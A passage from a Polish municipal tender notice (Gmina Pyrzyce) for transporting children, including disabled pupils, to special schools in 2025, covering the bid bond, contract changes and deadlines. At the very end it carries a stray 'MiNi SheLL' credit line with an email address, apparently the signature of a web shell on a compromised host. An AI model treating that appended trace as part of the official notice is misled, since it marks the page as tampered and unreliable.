środków<br/>dowodowych potwierdzających brak podstaw wykluczenia z postępowania.W przypadku wspólnego<br/>ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 1.4 składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej. Wymienione oświadczenie należy<br/>złożyć w oparciu o zamieszczony na stronie internetowej Zamawiającego https://platformazakupowa.pl/pn/um_pyrzyce wykaz<br/>złożonych w danym postępowaniu ofert, zgodnie ze wzorem zamieszczonym w załączniku Nr 5 do SWZ.<br/>2) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 Ustawy;<br/>Dokumenty powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak<br/>wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>b) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce<br/>zamieszkania tej osoby.<br/>Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> . W przedmiotowym postępowaniu jest wymagane wadium. Zamawiający żąda wniesienia wadium w wysokości 5000,00 zł (pięć tysięcy złotych) w terminie<br/>do dnia 03.12.2024 , do godz. 10:00<br/>2. Wadium może być wniesione w jednej lub kilku formach przewidzianych art. 97 ust 7 Ustawy:<br/>1)	pieniądzu,<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,<br/>z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3)	gwarancjach bankowych,<br/>4)	gwarancjach ubezpieczeniowych,<br/>5)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości tj. (Dz. U. z 2024 r. poz. 419 z późn. zm.).<br/>3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: <br/>w BNP PARIBAS nr 07 2030 0045 1110 0000 0112 5470 z adnotacją na blankiecie przelewu: Wadium - „Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka Rehabilitacyjno- Edukacyjno- Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie, Specjalnego Ośrodka Szkolno- Wychowawczego ul. Janusza Korczaka w Policach, w roku szkolnym od 2 stycznia 2025 r. do 31 grudnia 2025 r i odwożeniu trasą powrotną po zakończeniu nauki szkolnej”.<br/>4. Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmiot, o którym mowa w art. 6b ust 5 pkt. 2 ustawy z dnia 2 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy wnieść w formie nienaruszonego oryginału razem z ofertą w osobnej kopercie.<br/>5. Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, powinno wynikać bezwarunkowe, na każde pisemne żądanie przez Zamawiającego w terminie związanym ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium, w okolicznościach określonych w art. 98 ust. 5 i 6 Ustawy. Jeśli treść wnoszonego wadium będzie ograniczać w jakikolwiek sposób bezwarunkowy i na każde pisemne żądanie zgłoszone przez Zamawiającego wypłatę wadium Zamawiający uzna, że wadium zostało nieskutecznie wniesione.<br/>6. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br/>1)	nazwę Wykonawcy, beneficjenta gwarancji (Zamawiającego), gwaranta (bank lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazania ich siedziby,<br/>2)	oznaczenie postępowania,<br/>3)	określenie przedmiotu postępowania,<br/>4)	określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>5)	kwotę gwarancji,<br/>6)	termin ważności gwarancji.<br/>W przypadku wadium wnoszonego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jako zobowiązanego należy oznaczyć wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.<br/>8. Zgodnie z art. 97 ust. 5 ustawy wadium musi być wniesione przed upływem terminu składania ofert.<br/>9. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunek bankowy Zamawiającego.<br/>Szczegółowe informacje dotyczące wadium zawiera Rozdział V SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wzór umowy stanowi załącznik nr 4 do SWZ.<br/>2. Umowa zostanie zawarta w formie pisemnej:<br/>1)	w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zostało ono przesłane faksem lub drogą elektroniczną, lub<br/>2)	w terminie nie krótszym niż 10 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zostało ono przesłane pisemnie,<br/>3)	w przypadku gdy, w postępowaniu złożona została tylko jedna oferta lub nie odrzucono żadnej oferty oraz nie wykluczono żadnego Wykonawcy, możliwe jest zawarcie umowy przed upływem ww. terminów.<br/>3. O miejscu i terminie podpisania umowy Zamawiający powiadomi wybranego Wykonawcę.<br/>4. W przypadku, gdy okaże się, że Wykonawca, którego oferta została wybrana będzie uchylał się od zawarcia umowy lub nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia postępowania.<br/>5. Zakazuje się zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna<br/>z następujących okoliczności:<br/>1)	zmiany dotyczą realizacji dodatkowych usług od dotychczasowego Wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne do zrealizowania zamówienia:<br/>a)	nastąpiła zmiana tras dowozów i odwozów uczniów,<br/>b)	nastąpiła istotna zmiana w liczbie dowożonych uczniów,<br/>c)	nastąpiła konieczność wykonywania dodatkowych kursów autobusowych.<br/>6. Zmianę postanowień zawartych w umowie uznaje się za istotną, jeżeli:<br/>1)	zmienia ogólny charakter umowy, w stosunku do charakteru umowy w pierwotnym brzmieniu,<br/>2)	nie zmienia ogólnego charakteru umowy i zachodzi co najmniej jedna z następujących okoliczności:<br/>a)	zmiana wprowadza warunki, które gdyby były postawione w postępowaniu o udzielenie zamówienia, to w tym postępowaniu wzięliby lub mogliby wziąć udział inni Wykonawcy lub przyjęto by oferty innej treści,<br/>b)	zmiana narusza równowagę ekonomiczną umowy na korzyść Wykonawcy w sposób nieprzewidziany pierwotnie w umowie,<br/>c)	zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikający z umowy,<br/>d)	polega na zastąpieniu Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym Wykonawcą, w przypadkach innych niż określone w umowie lub Ustawie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem formularza na Platformie na stronie postępowania, znajdującej się pod adresem wskazanym na stronie internetowej https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com